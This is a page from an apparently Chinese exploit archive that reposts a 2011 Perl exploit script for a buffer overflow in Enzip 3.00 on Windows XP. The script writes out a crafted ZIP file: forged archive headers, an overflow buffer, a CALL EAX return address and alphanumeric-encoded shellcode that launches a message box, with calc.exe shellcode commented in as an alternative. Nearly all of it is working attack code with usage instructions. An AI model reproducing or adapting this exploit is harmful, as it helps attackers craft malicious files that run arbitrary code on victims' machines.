首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Enzip 3.00 Buffer Overflow Exploit
来源:http://www.invasao.com.br 作者:G0M3S 发布时间:2011-01-07  

#[+]Exploit Title: Exploit Buffer Overflow Enzip 3.00
#[+]Date: 01\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.bcuc.ac.uk/files/enzip300.exe
#[+]Version: 3.00
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#Create BY C4SS!0 G0M3S
#Louredo_@hotmail.com
#Website http://www.invasao.com.br
#
#
#HOW TO:
#
#OPEN THE FILE WITH THE SPECIALLY DESIGNED ENZIP 3.00
#THEN CLICK BUTTON TO THE RIGHT ON TOP OF THE FILE NAME
#SELECT OPTION THEN OPEN THE PROGRAM SHOWS IN MY CASE Shellcode is a MessageBox ()
#
#


if($#ARGV!=0)
{
system("cls");
system("color 4f");
sub usage
{
print "\n\n".                 
      "             ||========================================||\n".
   "             ||                                        ||\n".
   "             ||    Exploit Buffer Overflow Enzip 3.00  ||\n".
   "             ||    Created BY C4SS!0 G0M3S             ||\n".
   "             ||    Louredo_\@hotmail.com                ||\n".
   "             ||                                        ||\n".
   "             ||========================================||\n\n\n";

  
print "[+]Exploit: Exploit Buffer Overflow Enzip 3.00\n";
print "[+]Date: 01\\06\\2011\n";
print "[+]Author: C4SS!0 G0M3S\n";
print "[+]Home: www.invasao.com.br\n";
print "[+]Version: 3.00\n";
print "[+]Tested On: WIN-XP SP3 Portuguese Brazilian\n";
print "[+]E-mail: Louredo_\@hotmail.com\n\n";
print "[+]Note:\n\nRead the comments above to Learn How to Exploit Works\n\n\n";

}
usage;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 exploit.zip\n";
exit(0);
 
}
  

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
usage;
print "[*]Preparing payload\n";
sleep(1);

my $payload = "\x41" x 1024;
$payload .= "BBBB"; #VALUE DE EAX
$payload .= "CCCC"; #VALUE DE EDX
$payload .= "DDDD"; #VALUE DE ECX

 


$payload .= "\x42" x 1022;
$payload .= pack('V',0x5D54296F); # CALL EAX COMCTL32.DLL

 

$payload .= "\x43" x 40;


print "[*]Identifying the length Shellcode\n";
sleep(1);

#
#
#SHELLCODE ENCODER USING ALPHA 2 BASEADDRESS EAX
#
#PROMPT:
#
#C:\alpha> alpha2 --uppercase eax < File_name.txt
#
#

$shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI6SYP03O903XRWC9KPPRHR".
"LBL10Q03XWCP26N2DU8453CRE3BV4F8OKCKUMK0CL0PKO8SZ0P38R0R89QN3W6PZOK1O1TQTQB14Q0QS".
"X51E73UW22HPMCUSCT3PT0ZV2PPNYP0NNMPSLKON1VSYYVSN26SYKF1RHPSWP10WPSXQWP00MFSSXV3W".
"Q6PWPBHQ00CWDV3SXU4Q0W2RYRHRO3YD43UE8QU2XD0RLV4V9PSRHGQP0WPQ0CX73P4630SPT1KBJQP1".
"C0QPRKOHPVSYPPPONJZXJK1SLKON6A";
#
#
#OR THIS SHELLCODE WinExec("CALC.EXE",0)
#
#PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D
#46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X
#USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY
#41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT
#YK7OGT8FOPYLP3K8W5UCOM83KYZA
#
#

 

print "[*]The length is Shellcode:".length($shellcode)."\n";
sleep(1);

 

$payload .= $shellcode;
$payload .= "\x46" x (1568 - length($shellcode));


$payload .= "\x52\x58\x66\x05\xB2\x0B\x40\x40".
"\x40" x 10;
$payload .= "\x50\x98\xd1";


$payload .= "\x4a" x (4064 - length($payload));

 

 

$file = $ARGV[0];

$payload = $payload.".txt";
my $zip = $ldf_header.$payload.
              $cdf_header.$payload.
     $eofcdf_header;
print "[*]Creating the File $file\n";

open(f,">$file") or die("ERROR\n$!\n");
print f $zip;
close(f);
print "[*]The File $file was Successfully Created\n";
sleep(1);
exit(0);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows CreateSizedD
·Concrete CMS 5.4.1.1 XSS / Cod
·proftpd multiple exploit for V
·Enzip 3.00 Buffer Overflow
·BS.Player 2.57 Buffer Overflow
·Linux Kernel CAP_SYS_ADMIN to
·VideoSpirit Pro <= v1.68 Local
·Concrete CMS v5.4.1.1 XSS/Remo
·NetSupport Manager Agent Remot
·PhpGedView <= 4.2.3 Local File
·HP Data Protector Manager v6.1
·Xynph 1.0 USER Denial of Servi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved